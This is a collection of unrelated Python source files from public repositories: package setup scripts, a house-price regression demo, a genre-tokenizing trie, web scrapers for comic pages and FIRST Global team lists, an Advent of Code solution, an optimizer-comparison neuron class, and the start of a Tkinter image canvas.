os.path.exists(\n \"gitbranch-master\"\n):\n raise Exception(\"You have the wrong code or git branch for Python 2.4, 2.5\")\n\n\n# Get the package information used in setup().\nfrom __pkginfo__ import (\n author,\n author_email,\n classifiers,\n entry_points,\n install_requires,\n license,\n long_description,\n modname,\n packages,\n py_modules,\n short_desc,\n __version__,\n web,\n zip_safe,\n)\n\n__import__(\"pkg_resources\")\nfrom setuptools import setup\n\nsetup(\n author=author,\n author_email=author_email,\n classifiers=classifiers,\n data_files=[\n (\n \"trepan/processor/command/help\",\n [\n \"trepan/processor/command/help/arange.rst\",\n \"trepan/processor/command/help/command.rst\",\n \"trepan/processor/command/help/examples.rst\",\n \"trepan/processor/command/help/filename.rst\",\n \"trepan/processor/command/help/location.rst\",\n \"trepan/processor/command/help/range.rst\",\n \"trepan/processor/command/help/suffixes.rst\",\n ],\n )\n ],\n description=short_desc,\n entry_points=entry_points,\n install_requires=install_requires,\n license=license,\n long_description=long_description,\n py_modules=py_modules,\n name=modname,\n packages=packages,\n test_suite=\"nose.collector\",\n url=web,\n version=__version__,\n zip_safe=zip_safe,\n)\n","repo_name":"rocky/python2-trepan","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"37"} +{"seq_id":"19985788978","text":"import pandas as pd #导入Pandas,用于数据读取和处理\r\n# 读入房价数据,示例代码中的文件地址为internet链接,读者也可以下载该文件到本机进行读取\r\ndf_housing = pd.read_csv(\"E:\\demo\\mechineLearning\\house.csv\") \r\n# 构造特征数据集\r\nX = df_housing.drop(\"median_house_value\", axis = 1)\r\n# 构造标签数据集\r\ny = df_housing.median_house_value\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# 导入线性回归模型\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel = LinearRegression()\r\n# 训练模型\r\nmodel.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\nprint('真实房价', y_test)\r\nprint('预测房价', y_pred)\r\n\r\n# 打分\r\nprint(\"模型评分:\", model.score(X_test, y_test))\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.scatter(X_test.median_income, y_test, color = 'red')\r\nplt.plot(X_test.median_income, y_pred, color = 'blue', linewidth = 1)\r\nplt.table('Median Income')\r\nplt.table('Median House Value')\r\nplt.show()\r\n\r\n","repo_name":"zyk1218/mechineLearning","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22841245591","text":"import wordninja\nfrom operator import truediv\n\n\nclass TrieNode(object):\n \"\"\"\n Trie Node\n \"\"\"\n\n def __init__(self, char):\n # The character\n self._char = char\n\n # The children nodes,keys are chars, values are nodes\n self._children = {}\n\n # Marks if the node is the last character of the word\n self._is_word = False\n\n # Keeps track of the actual word\n self._word = None\n\n @property\n def isWord(self):\n return self._is_word\n\n @isWord.setter\n def isWord(self, value):\n self._is_word = value\n\n\nclass Trie(object):\n \"\"\"\n Trie implementation, adjusted for genre representation\n \"\"\"\n\n def __init__(self):\n self._root = TrieNode(\"*\")\n\n\n def tokenize(self, string):\n \"\"\"\n Given a string tokenize it into words that are present in the Trie. If not successful, returns an empty string ''\n \"\"\"\n def _tokenize(index, node=None, acc=[]):\n if node is None:\n node = self._root\n\n if index >= len(string):\n if node.isWord:\n return acc\n else:\n return []\n else:\n char = string[index]\n if char in node._children:\n if node.isWord:\n\n # It will be greedy trying to match the longest word possible\n acc1 = _tokenize(index + 1, node=node._children[char], acc=[char])\n\n if acc1:\n ## if that recursive branch succeeds then return the result\n acc.extend(acc1)\n return acc\n else:\n ## because the above recursion failed be less greedy and take\n ## the next best match path\n acc.append(\" \")\n return _tokenize(index, node=None, acc=acc)\n else:\n acc.append(char)\n return _tokenize(index + 1, node=node._children[char], acc=acc)\n else:\n if node.isWord:\n acc.append(\" \")\n return _tokenize(index, node=None, acc=acc)\n else:\n return []\n\n # Result is a list of chars, with space to delimit each word\n acc = _tokenize(index=0)\n if len(acc) == 0:\n tokens = []\n else:\n tokens = ''.join(acc).split(' ')\n return tokens\n\n\n def _has_prefix(self, prefix, check_has_word):\n \"\"\"\n Check if a prefix exists in the trie\n if check_has_word is True, then it checks whether the word to exist\n \"\"\"\n if prefix is None:\n return False\n\n chars = list(prefix)\n node = self._root\n for char in chars:\n if char not in node._children:\n return False\n node = node._children[char]\n\n if check_has_word:\n return node.isWord\n else:\n return True\n\n def has_prefix(self, prefix):\n \"\"\"\n Check if a prefix exists in the trie\n \"\"\"\n return self._has_prefix(prefix, False)\n\n def has_word(self, prefix):\n \"\"\"\n Check if a word exists in the trie\n \"\"\"\n return self._has_prefix(prefix, True)\n\n\n def _add_word(self, word):\n \"\"\"\n Add a word in the trie\n \"\"\"\n chars = list(word)\n node = self._root\n\n for char in chars:\n if char not in node._children:\n node._children[char] = TrieNode(char)\n node = node._children[char]\n\n node.isWord = True\n node._word = word\n\n def get_words(self, prefix=None):\n \"\"\"\n Return all the words in the trie, having the given prefix\n If prefix is None, it returns all the words\n \"\"\"\n def _get_word_list(node, prefix, result):\n if node.isWord:\n result.append(prefix)\n for char in node._children.keys():\n _get_word_list(node._children[char], prefix + char, result)\n\n if prefix is None:\n return None\n\n result = []\n node = self._root\n chars = list(prefix)\n\n for char in chars:\n if char not in node._children:\n return result\n node = node._children[char]\n _get_word_list(node, prefix, result)\n return result\n\n def get_all_words(self):\n \"\"\"\n Return all the words in the trie\n \"\"\"\n return self.get_words(\"\")\n\n def print_words(self, prefix=\"\"):\n \"\"\"\n Print all words that start with given prefix\n If prefix is \"\", all the words of the trie are printed\n \"\"\"\n result = self.get_words(prefix)\n for concept in result:\n print(concept)\n\n\n def _mark_known_words(self, words):\n \"\"\"\n Returns a list of tuple,\n each composed of the word and a boolean flag marking if the word is in the trie or not\n \"\"\"\n words_with_in_trie_flags = []\n for word in words:\n if self.has_word(word):\n words_with_in_trie_flags.append((word, True))\n else:\n # try to tokenize instead\n tokens = self.tokenize(word)\n if len(tokens) > 0 and self._acceptable_tokenization(word, tokens):\n for token in tokens:\n words_with_in_trie_flags.append((token, True))\n else:\n words_with_in_trie_flags.append((word, False))\n return words_with_in_trie_flags\n\n def decode_tag(self, word):\n \"\"\"\n Decode a genre in tokens following the same procedure as when the trie was built\n \"\"\"\n tokens = self.tokenize(word)\n wiki_tokens = wordninja.split(word)\n\n if len(tokens) == 1 and len(wiki_tokens) == 1:\n return tokens\n\n marked = self._mark_known_words(wiki_tokens)\n wiki_tokens = [word for word, known in marked]\n\n # if all words are known prioritize the wiki\n for token, known in marked:\n if not known:\n return tokens\n\n if len(tokens) <= len(wiki_tokens):\n return tokens\n\n return wiki_tokens\n\n def _is_short_string(self, string, upper_limit = 3):\n \"\"\"\n Check if a given string is short\n upper_limit specifies the upper bound length of a short string\n \"\"\"\n return len(string) <= upper_limit\n\n def _is_wikipedia_word(self, string):\n \"\"\"\n Check if a given word exists in wikipedia\n \"\"\"\n\n # Use wordninja to split the word\n # It is a probalistic approach to split based on Wikipedia;\n # It works mostly for English words\n words = wordninja.split(string)\n\n # If there is only one returned word, the string itself\n # then it means that the string exists in wikipedia as a word\n return len(words) == 1\n\n def _tokens_in_order_form_word(self, tokens, word):\n \"\"\"\n Check if the given list of tokens form the word through concatenation\n \"\"\"\n return word == ''.join(tokens)\n\n def _are_many_short_tokens(self, tokens, word, average_length = 3.):\n \"\"\"\n Check if word is split in too many short tokens\n average length is set to 3 chars\n \"\"\"\n # Input checks\n if not self._tokens_in_order_form_word(tokens, word):\n raise ValueError(\"The tokens do not appear to be extracted from the given word\", tokens, word)\n\n # Word is split in too many short tokens if there are many tokens with length < average_length\n return len(tokens) > round(len(word)/average_length + .2)\n\n def _count_short_tokens_exceeds_threshold(self, tokens, short_max_length = 2, threshold = 2):\n \"\"\"\n Check if the number of short tokens exceeds a threshold set by default to 2\n A token is short if its lenght is <= short_max_length\n \"\"\"\n return sum([len(token) <= short_max_length for token in tokens]) >= threshold\n\n\n def _has_short_suffix(self, tokens, len_chars = 2):\n \"\"\"\n Check if the last token, the suffix, is 1-char long\n \"\"\"\n return len(tokens) > 1 and len(tokens[-1]) <= len_chars\n\n\n def _known_tokens_single__middle_letters(self, marked_wiki_tokens):\n \"\"\"\n Check if the known tokens are single letters\n \"\"\"\n\n # Ignore if the first letter is a token because often genres have prefixes of 1-letter long\n for token, known in marked_wiki_tokens[1:]:\n if known and len(token) == 1:\n return True\n return False\n\n def _acceptable_tokenization(self, word, tokens):\n \"\"\"\n A tokenization is acceptable if multiple rules are met\n not too many short tokens\n the number of short tokens does not exceed a threshold\n the last token is not 1-char long\n \"\"\"\n return not (self._are_many_short_tokens(tokens, word)\n or self._count_short_tokens_exceeds_threshold(tokens)\n or self._has_short_suffix(tokens))\n\n def _get_valid_tokenization_for_start_with_known(self, tokens):\n \"\"\"\n Returns a list of valid tokens for the case when the first token is known\n\n The idea is that unknown tokens after known tokens are not considered as relevant\n and are appended instead to the previous known token\n \"\"\"\n valid_tokens = []\n\n for token, known in tokens:\n if known:\n # If it is known just add it to the list of valid tokens\n valid_tokens.append(token)\n else:\n # If it is unknown append it to the last known token as a suffix\n valid_tokens[-1] += token\n\n return valid_tokens\n\n\n def _get_valid_tokenization_for_start_with_unknown(self, tokens):\n \"\"\"\n Returns a list of valid tokens for the case when the first token is unknown\n\n The idea is that unknown tokens before known tokens are considered as relevant\n and are stored as standalone concepts\n \"\"\"\n valid_tokens = []\n\n # If the last tokens are unknow append them to the last known token as suffix\n last_unknown = ''\n for token, known in tokens:\n if known:\n if last_unknown != '':\n valid_tokens.append(last_unknown)\n last_unknown = ''\n\n valid_tokens.append(token)\n else:\n last_unknown += token\n\n # Check for situations like Unknown+\n if len(valid_tokens) == 0:\n valid_tokens.append(last_unknown)\n # Check for situation like (Uknown+ Known+)+ Unknown+\n elif len(tokens) >= 2 and not tokens[-1][1]:\n valid_tokens[-1] += last_unknown\n\n return valid_tokens\n\n def _get_valid_tokenization(self, tokens):\n \"\"\"\n This function produces a valid tokenization to be added to a trie from\n a list of tokens depending on their belonging to a vocabulary.\n\n Tokens is a list of tuples containing a token and a\n boolean indicating whether the token is part of the vocabulary.\n \"\"\"\n # If the first token is known\n if tokens[0][1]:\n # Apply the first strategy\n return self._get_valid_tokenization_for_start_with_known(tokens)\n\n # If the first token was unknonw the expression is parsed differently\n return self._get_valid_tokenization_for_start_with_unknown(tokens)\n\n def _add_with_wiki_tokenization(self, string):\n \"\"\"\n Helper method for adding a word tokenized with Wordninja\n It returns the concepts that were added\n \"\"\"\n wiki_tokens = wordninja.split(string)\n marked_wiki_tokens = self._mark_known_words(wiki_tokens)\n wiki_tokens = [word for word, known in marked_wiki_tokens]\n unknown_tokens = [token for token, known in marked_wiki_tokens if not known]\n\n if not self._acceptable_tokenization(string, wiki_tokens):\n # If the tokenization was not acceptable add the complete string\n self._add_word(string)\n #print(\"WN_SPLIT_BREAK_HEURISTICS \", string, wiki_tokens)\n\n # And return it as the single token\n return [string]\n\n\n if self._tokens_in_order_form_word(unknown_tokens, string):\n # If all tokens form the word, then add it to the trie\n # It was noticed in experiments that it behaved better this way\n self._add_word(string)\n #print (\"WN_SPLIT_UNKNOWN_WORD \", word, wiki_tokens)\n\n # And return the string as the single token\n return [string]\n\n if self._known_tokens_single__middle_letters(marked_wiki_tokens):\n self._add_word(string)\n return [string]\n\n # The tokenization given by wordninja is checked against the trie\n # and some further preprocessing is done to get a valid tokenization\n final_concepts = self._get_valid_tokenization(marked_wiki_tokens)\n\n for concept in final_concepts:\n if not self.has_word(concept):\n self._add_word(concept)\n\n return final_concepts\n\n def _try_add_with_trie_tokenization(self, string):\n \"\"\"\n It adds a string to trie by checking first if it can be tokenized and if the tokenization is acceptable\n Returns None if it was not a successful tokenization or the list of tokens if successful\n \"\"\"\n # First tokenize string by using the trie\n trie_tokens = self.tokenize(string)\n\n # If a tokenization was not possible with the trie\n if len(trie_tokens) == 0:\n return None\n\n # First check if there are short tokens in the result and\n if self._count_short_tokens_exceeds_threshold(trie_tokens, short_max_length = 2, threshold = 1):\n # the word would exists in wikipedia as a standalone word\n if self._is_wikipedia_word(string):\n # If yes, add the word\n self._add_word(string)\n # And return it as the single token\n return [string]\n\n # If the tokenization is acceptable\n if self._acceptable_tokenization(string, trie_tokens):\n # Return the obtained tokens\n return trie_tokens\n\n # the word is really long, give a shot with wikininja\n if len(string) > 15:\n return None\n\n # If the tokenization was not acceptable add the complete word\n self._add_word(string)\n # And return it as the single token\n return [string]\n\n\n\n def add_string_with_tokenization(self, string):\n \"\"\"\n Add a word by first trying its tokenization on the current trie content. This is adjusted to deal with genres written as multiple concatenated words without any space\n\n if the word is tokenized in multiple concepts then a list of concepts is returned, else the word is returned (this is used for adding the edges to the graph)\n \"\"\"\n\n # Safety checks on the input\n if string is None or len(string) == 0:\n return []\n\n # If string is short\n if self._is_short_string(string, upper_limit = 3):\n # Then add string to trie\n self._add_word(string)\n #print(\"WORD FOR SEEDING \", string)\n\n # Return list of tokens containing only the string\n return [string]\n\n # It tries to tokenize a word using the trie and to add it to the trie if the tokenization is not acceptable\n concepts = self._try_add_with_trie_tokenization(string)\n # If the tokenization and adding were successful\n if concepts is not None:\n # Return concepts\n return concepts\n\n # If the previous strategy to add the string by first trying trie tokenizations failed\n # Then split it instead with wordninja\n # https://github.com/keredson/wordninja\n # It is a probalistic approach to split based on Wikipedia words (mainly English)\n return self._add_with_wiki_tokenization(string)\n\n # Levenshtein distance from http://stevehanov.ca/blog/index.php?id=114\n def search(self, word, maxCost):\n \"\"\"\n The search function returns a list of all words that are less than the given\n maximum distance from the target word\n \"\"\"\n\n # Build first row\n currentRow = range(len(word) + 1)\n\n results = []\n\n # Recursively search each branch of the trie\n root = self._root\n for letter in root._children:\n self.search_recursive(root._children[letter], letter, word, currentRow, results, maxCost)\n\n return results\n\n\n def search_recursive(self, node, letter, word, previousRow, results, maxCost):\n \"\"\"\n This recursive helper is used by the search function above. It assumes that\n the previousRow has been filled in already.\n \"\"\"\n columns = len(word) + 1\n currentRow = [previousRow[0] + 1]\n\n # Build one row for the letter, with a column for each letter in the target\n # word, plus one for the empty string at column 0\n for column in range(1, columns):\n insertCost = currentRow[column - 1] + 1\n deleteCost = previousRow[column] + 1\n\n if word[column - 1] != letter:\n replaceCost = previousRow[column - 1] + 1\n else:\n replaceCost = previousRow[column - 1]\n\n currentRow.append(min(insertCost, deleteCost, replaceCost))\n\n # If the last entry in the row indicates the optimal cost is less than the\n # maximum cost, and there is a word in this trie node, then add it.\n if currentRow[-1] <= maxCost and node._word != None:\n results.append((node._word, currentRow[-1]))\n\n # if any entries in the row are less than the maximum cost, then\n # recursively search each branch of the trie\n if min(currentRow) <= maxCost:\n for letter in node._children:\n self.search_recursive(node._children[letter], letter, word, currentRow, results, maxCost)\n\n\n","repo_name":"deezer/MusicGenreTranslation","sub_path":"tag_translation/kb/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":18623,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"611841477","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='surveySimPP',\n version='0.1.0',\n\n packages=setuptools.find_packages(),\n\n\n entry_points={\n 'console_scripts': [\n 'surveySimPP = surveySimPP.surveySimPP:main',\n 'makeConfigOIF=utilities.makeConfigOIF:main',\n 'makeConfigPP=utilities.makeConfigPP:main'\n ],\n },\n\n\n\n author=\"Meg Schwamb\",\n author_email=\"m.schwamb@qub.ac.uk\",\n description=\"The Survey Simulator Post Processing code for the LSST\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dirac-institute/survey_simulator_post_processing\",\n# packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",],\n \n install_requires=['numpy', 'pandas==1.3.5', 'scipy', 'astropy','sbpy @ git+https://github.com/NASA-Planetary-Science/sbpy.git'],\n\n )\n","repo_name":"smmatthews/survey_simulator_post_processing","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"128671654","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\nimport re\r\nimport webbrowser\r\n\r\ndef store_imgurl_to_list(comicpage, imgurl_list):\r\n\t'''\r\n\tTake a url as an argument, this function will store the image url link on that page to a list.\r\n\tThe first argument is the url, second argument is the variable name that result will store in.\r\n\t'''\r\n\t#retrieve the javascript into string variable \"target\"\r\n\tr = requests.get(comicpage)\r\n\tsoup = BeautifulSoup(r.content ,'html.parser')\r\n\ttarget = str((soup.find_all('script',{'language':'javascript'})[2]))\r\n\t#get imgurl through regex from \"target\"\r\n\timgurl = re.findall(r'\\\"(.+?)\\\"',target)\r\n\t# imgurl is now ['']\r\n\tdel imgurl[0]\r\n\timgurl = imgurl[0] + 'http://n.kukudm.com/' + imgurl[1]\r\n\timgurl_list.append(imgurl)\r\n\r\n\r\ndef write_html(list,file):\r\n\t'''\r\n\twrite the list into the file\r\n\t'''\r\n\t#append into html page\r\n\t#produce a clean html file with all the picture\r\n\twith open('pics/pics.html', 'w', encoding='utf-8') as file:\r\n\t file.write('')\r\n\r\n\twith open('pics/pics.html', 'a', encoding='utf-8') as file:\r\n\t for imgurl in imgurl_list:\r\n\t file.write( imgurl +'
')\r\n\r\ndef url_extracting(anyurl):\r\n\t'''\r\n\tGive the first page url of the comic book, this function will return all the page url in a list.\r\n\t'''\r\n\t#retrieve the javascript into string variable \"target\"\r\n\tr = requests.get(anyurl)\r\n\tsoup = BeautifulSoup(r.content ,'html.parser')\r\n\ttarget = str(soup)\r\n\t#get imgurl through regex from \"target\"\r\n\tpage_numbers = int(re.findall(r'\\共(.+?)\\页',target)[0])\r\n\turl_list = []\r\n\tfor i in range(1,page_numbers+1):\r\n\t\turl = anyurl.replace('1.htm', str(i)+'.htm' )\r\n\t\turl_list.append(url)\r\n\treturn (url_list)\r\n\r\n\r\nimgurl_list = []\r\ncomicbook = input('''give me first page url of that comic book: \r\nfor example \\'http://comic.kukudm.com/comiclist/364/5048/1.htm\\'\r\nPlease note that only comics on http://comic.kukudm.com/ will be available\r\nAnd that the process may continue for 2 to 3 minutes \r\n ''') \r\nurl_list = url_extracting(comicbook)\r\nfor url in url_list:\r\n\tstore_imgurl_to_list(url, imgurl_list)\r\nwrite_html(imgurl_list,'pics/pics.html')\r\n\r\nwebbrowser.open('file:///C:/Users/tj371_000/Desktop/venv_parse/src/pics/pics.html')\r\n\r\n","repo_name":"jtanaa/comic-book-scraping","sub_path":"parse_kukudm.py","file_name":"parse_kukudm.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19978480180","text":"#!/usr/bin/env python3\nfrom sys import stdin\nimport re\n\n\ndef checkNum(num, low, high):\n return (int(num) >= low and int(num) <= high) if num.isnumeric() else False\n\n\n# validate params\ndef validate(inf):\n params = [\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\"]\n\n # existence\n for key in params:\n if key not in inf:\n return False\n\n check = True\n # byr\n # print(inf)\n check = check and checkNum(inf[\"byr\"], 1920, 2002)\n check = check and checkNum(inf[\"iyr\"], 2010, 2020)\n check = check and checkNum(inf[\"eyr\"], 2020, 2030)\n\n hgt = inf[\"hgt\"]\n hsuf = hgt[-2:]\n if not hgt[:-2].isnumeric():\n return False\n\n hnum = int(hgt[:-2])\n\n if hsuf == \"in\":\n check = check and (hnum >= 59 and hnum <= 76)\n elif hsuf == \"cm\":\n check = check and (hnum >= 150 and hnum <= 193)\n else:\n return False\n\n check = check and bool(re.match(\"^#[a-z0-9]{6}$\", inf[\"hcl\"]))\n\n check = check and (\n inf[\"ecl\"] in set([\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"])\n )\n\n check = check and bool(re.match(\"^[0-9]{9}$\", inf[\"pid\"]))\n\n return check\n\n\ncount = 0\ninfo = {}\nfor line in stdin:\n # reset\n if line == \"\\n\":\n count += 1 if validate(info) else 0\n info = {}\n else:\n for param in line.split(\" \"):\n k, v = map(str.strip, param.split(\":\"))\n info[k] = v\n\nif info:\n print(count + validate(info))\nelse:\n print(count)\n","repo_name":"AD9000/AdventOfCode","sub_path":"python/Day4/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40520770093","text":"import numpy as np\n\nclass SN:\n def __init__(self, w_init, b_init, algo):\n self.w = w_init # Weight\n self.b = b_init # bias \n self.w_h = [] # History of weight\n self.b_h = [] # History of bias\n self.e_h = [] # Loss \n self.algo = algo # Algorithm\n \n def sigmoid(self, x, w=None, b=None):\n if w is None:\n w = self.w\n if b is None:\n b = self.b\n return 1. / (1. + np.exp(-(w*x +b)))\n \n def error(self, X, Y, w= None, b= None):\n if w is None:\n w = self.w\n if b is None:\n b = self.b\n err = 0\n for x,y in zip(X,Y):\n err += 0.5 *(self.sigmoid(x,w,b) - y)**2 # MEAN SEQUARED ERROR\n return err\n \n \n def grad_w(self,x,y, w=None,b=None):\n if w is None:\n w = self.w\n if b is None:\n b = self.b\n y_pred = self.sigmoid(x,w,b)\n return (y_pred -y) * y_pred * (1 - y_pred) *x\n \n def grad_b(self,x,y, w=None, b=None):\n if w is None:\n w = self.w\n if b is None:\n b = self.b\n y_pred = self.sigmoid(x,w,b)\n return (y_pred - y) * y_pred *(1 - y_pred)\n \n \n def fit(self, X, Y,\n epochs=100, eta=0.01, gamma =0.9,\n mini_batch_size=100, eps=1e-8,\n beta =0.9, beta1=0.9, beta2 =0.9):\n self.w_h = []\n self.b_h = []\n self.e_h = []\n self.X = X\n self.Y = Y\n \n \n if self.algo == 'GD':\n for i in range(epochs):\n dw, db =0, 0\n for x,y in zip(X,Y):\n dw += self.grad_w(x,y)\n db += self.grad_b(x,y)\n self.w -= eta * dw / X.shape[0]\n self.b -= eta * db / X.shape[0]\n self.append_log()\n \n elif self.algo == 'Momentum':\n v_w_prev, v_b_prev =0, 0\n for i in range(epochs):\n dw, db = 0, 0\n for x,y in zip(X,Y):\n dw += self.grad_w(x,y)\n db += self.grad_b(x,y)\n v_w = gamma * v_w_prev + eta * dw\n v_b = gamma * v_b_prev + eta *db\n self.w = self.w - v_w\n self.b = self.b - v_b\n v_w_prev = v_w\n v_b_prev = v_b\n self.append_log()\n \n elif self.algo == 'NAG':\n v_w_prev, v_b_prev = 0, 0\n for i in range(epochs):\n dw, db = 0,0\n v_w = gamma * v_w_prev\n v_b = gamma * v_b_prev\n for x,y in zip(X,Y):\n dw += self.grad_w(x, y, self.w - v_w, self.b - v_b)\n db += self.grad_b(x, y, self.w - v_w, self.b - v_b)\n \n v_w = gamma * v_w_prev + eta * dw\n v_b = gamma * v_b_prev + eta * db\n self.w = self.w - v_w\n self.b = self.b - v_b\n v_w_prev = v_w\n v_b_prev = v_b\n self.append_log()\n \n elif self.algo == 'MiniBatch':\n for i in range(epochs):\n dw, db = 0, 0\n points_seen = 0\n for x,y in zip(X,Y):\n dw += self.grad_w(x,y)\n db += self.grad_b(x, y)\n points_seen += 1\n if points_seen % mini_batch_size == 0:\n self.w -= eta * dw / mini_batch_size\n self.b -= eta * db / mini_batch_size\n self.append_log()\n dw, db = 0,0\n \n elif self.algo == 'AdaGrad':\n v_w, v_b = 0, 0\n for i in range(epochs):\n dw, db = 0, 0\n for x,y in zip(X,Y):\n dw += self.grad_w(x, y)\n db += self.grad_b(x, y)\n v_w = dw**2\n v_b = db**2\n self.w -= (eta /np.sqrt(v_w)+eps) * dw\n self.b -= (eta / np.sqrt(v_b) + eps) *db\n self.append_log()\n \n elif self.algo == 'RMSProp':\n v_w, v_b = 0, 0\n for i in range(epochs):\n dw, db = 0, 0\n for x, y in zip(X, Y):\n dw += self.grad_w(x,y)\n db += self.grad_b(x ,y)\n v_w = beta * v_w + (1- beta)* dw**2\n v_b = beta * v_b + (1 - beta) * db**2\n self.w -= (eta / np.sqrt(v_w) + eps) *dw\n self.b -= (eta /np.sqrt(v_b + eps)) *db\n self.append_log()\n \n elif self.algo == 'Adam':\n \n v_w, v_b = 0, 0\n m_w, m_b = 0, 0\n num_updates = 0\n for i in range(epochs):\n dw, db = 0,0\n for x,y in zip(X,Y):\n\n dw = self.grad_w(x,y)\n db = self.grad_b(x,y)\n num_updates += 1\n m_w = beta1 * m_w + (1 - beta1)*dw\n m_b = beta1 * m_b + (1- beta1)*db\n v_w = beta2 * v_w + (1 -beta2) * dw**2\n v_b = beta2 * v_b + (1 - beta2) * db**2\n m_w_c = m_w / (1 -np.power(beta1, num_updates))\n m_b_c = m_b / (1- np.power(beta1, num_updates))\n v_w_c = v_w / (1- np.power(beta2, num_updates))\n v_b_c = v_b / (1- np.power(beta2, num_updates))\n self.w -= (eta / np.sqrt(v_w_c)+ eps) * m_w_c\n self.b -= (eta / np.sqrt(v_b_c) +eps) *m_b_c\n self.append_log()\n \n def append_log(self):\n self.w_h.append(self.w)\n self.b_h.append(self.b)\n self.e_h.append(self.error(self.X, self.Y)) ","repo_name":"prajinkhadka/Optimization_Algorithms_Visualization","sub_path":"SigmoidNeuron.py","file_name":"SigmoidNeuron.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"40735612475","text":"import gen\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\ndef fetchYearTeams(year):\r\n raw = requests.get('https://first.global/'+ str(year) +'-nations/')\r\n soup = BeautifulSoup(raw.content, \"lxml\")\r\n articles = soup.find_all('article')\r\n \r\n baseList = []\r\n finalList = []\r\n for article in articles:\r\n link = article.find('a')\r\n name = link.get('title')\r\n url = link.get('href')\r\n \r\n if name not in baseList:\r\n baseList.append(name)\r\n \r\n cleanedName = name.replace('Team ', '').replace(' '+str(year), '')\r\n finalList.append({'Team': cleanedName, 'Link': url})\r\n\r\n return finalList\r\n\r\nteams2018 = fetchYearTeams(2018)\r\nteams2017 = fetchYearTeams(2017)\r\n\r\nnames2017 = [team['Team'] for team in teams2017]\r\nfor team in teams2018:\r\n in2017 = team['Team'] in names2017\r\n \r\n team['In 2017'] = ''\r\n if in2017:\r\n team['In 2017'] = 'Yes'\r\n\r\n\r\nteams2018 = sorted(teams2018, key = lambda k: k['Team'])\r\ngen.listOfDictToCSV('FGC 2018 Teams', teams2018, ['Team', 'Link', 'In 2017'])","repo_name":"PChild/frc-data-scripts","sub_path":"fgcData.py","file_name":"fgcData.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35719728097","text":"test = \"2\"\r\nprint(test)\r\n\r\na = int(\"15\")\r\nb = int(\"12\")\r\nc = a+b\r\nprint(c)\r\n\r\nx = float(\"56.15\")\r\ny = int(\"12\")\r\nc = x+y\r\nprint(c)\r\n\r\ntest = str(input(\"Firstname\"))\r\ntest2 = str(input(\"Lastname\"))\r\nres = test + \" \" + test2\r\nprint(res)\r\n\r\n","repo_name":"Nairi-IT/NI","sub_path":"Lesson_N1.py","file_name":"Lesson_N1.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40461522994","text":"import hashlib\nimport logging\nimport os\nimport threading\nimport time\nfrom tkinter import *\n\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageTk\n\nfrom src.ImageProcessing.contouring import cnt_from_img, save_contour, save_image\n\n\nclass ResizingImageCanvas(Canvas):\n \"\"\"\n Customized Canvas that can handle dynamic image resizing and displays for slice contours.\n \"\"\"\n\n def __init__(self, parent=None, image=None, dicom_manager=None, **kwargs):\n \"\"\"\n Initializer\n :param parent: The parent to this tk Element\n :param image: The image to load\n :param dicom_manager: The DicomManager instance to assign to this class\n :param kwargs: Keyword arguments to pass to parent\n \"\"\"\n Canvas.__init__(self, **kwargs)\n self.parent = parent\n self.dm = dicom_manager\n self.logger = logging.getLogger(__name__)\n\n # Configure key and mouse bindings\n self.bind(\"\", self.keydispatch)\n self.bind(\"\", self.on_resize)\n self.bind(\"\", self.create_point)\n self.bind(\"\", self.plot_points)\n self.bind(\"\", self.toggle_smoothing)\n self.configure(cursor=\"crosshair red\")\n self.configure()\n\n # Configure window size\n self.height = self.winfo_reqheight()\n self.width = self.winfo_reqwidth()\n\n # Configure contour parameters\n self.user_points = []\n self.spline = 0\n self.new_point = False\n self.user_line_tag = \"usr_line\"\n self.user_point_tag = \"usr_point\"\n self.contour_line_tag = \"cnt_line\"\n self.contour_point_tag = \"cnt_point\"\n self.contours = None\n self.curr_contour = 0\n self.cnt_points = []\n self.contour_image = None\n self.contour_photo = None\n\n # Configure image parameters\n self.image_path = \"\"\n self.image_folder = \"\"\n self.image_names = []\n self.image_idx = 0\n self.image = None\n self.photo = None\n\n # Configure ROI parameters\n self.roi = None\n self.roi_set = False\n\n self.cnt_img = None\n\n self.thresh_val = 70\n\n self.ready = False\n\n self.set_image(image)\n\n def set_dm(self, dm):\n if dm is not None:\n self.logger.info(\"Got new DICOMManager\")\n self.dm = dm\n\n 